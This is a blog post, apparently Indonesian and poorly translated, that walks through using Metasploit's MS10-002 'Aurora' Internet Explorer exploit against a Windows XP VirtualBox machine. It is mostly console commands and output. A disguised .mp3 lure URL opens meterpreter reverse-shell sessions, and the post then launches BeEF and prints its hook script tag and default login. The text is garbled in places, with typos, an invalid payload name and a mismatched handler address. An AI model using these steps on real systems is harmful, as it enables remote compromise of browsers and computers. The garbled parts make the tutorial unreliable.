==>>Open windows in VirtualBox
┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
==>>then the next we enter the command start by typing commands exsploit ago exsploit ago
msf >show option
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
==>>The next after that typing back
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > show options
==>>The next after that typing back
msf exploit(ms10_002_aurora) > set URIPATH (nama file yg akan di krin).mp3
URIPATH => contoh smangewe.mp3
see the pictures in the block
==>>then further re-typing the command
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_rcp_dns
[-] The value specified for PAYLOAD is not valid.
msf exploit(ms10_002_aurora) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms10_002_aurora) > LPORT 53
[-] Unknown command: LPORT.
msf exploit(ms10_002_aurora) > set LPORT 53
LPORT => 53
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.56.1 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH smangewe.mp3 no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Automatic
==>> The next step typing back
msf exploit (ms10_002_aurora)> exploit
==>> then enter it will appear
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:53
[*] Using URL: http://192.168.56.1:8080/smangewe.mp3
[*] Server started.
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
Interrupt: use the 'exit' command to quit
==>> then copy the file brouser which appears at the top of that and get into the next stage of entry into windows in virtualbox and c
copy website on the internet before ExSplorer.
==>>then subsequently returned to the terminal and typing
msf exploit(ms10_002_aurora) > sessions -l
==>>then the note
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 XPSP3\XP SP3 @ XPSP3 192.168.56.1:53 -> 192.168.56.101:1058 (192.168.56.101)
msf exploit(ms10_002_aurora) > Interrupt: use the 'exit' command to quit
msf exploit(ms10_002_aurora) > [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: Died
msf exploit(ms10_002_aurora) >
[*] 192.168.56.101 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (884270 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:53 -> 192.168.56.101:1032) at 2015-08-28 02:56:38 +0700
[*] 192.168.56.101 - Meterpreter session 2 closed. Reason: Died
The sign EXSPLOIT WE SEND ALREADY WORKED
then automatically we will go into early tampialan further beef bka termina to enter beef BEEF typing in terminal
┌─[root@parrot]─[/home/budhya]
└──╼ #service beef-xss start
┌─[root@parrot]─[/home/budhya]
└──╼ #beef-xss -h
[*] Please wait as BeEF services are started.
[*] You might need to refresh your browser once it opens.
[*] UI URL: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>
(process:18938): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
FoxyProxy settingsDir: /root/.mozilla/firefox/a6mpn2rf.default/foxyproxy.xml
then automatically we will go into early tampialan beef
Masuka user name and passworduser name : beef
password : beef
then we can use within their meef our purposes.
Tidak ada komentar:
Posting Komentar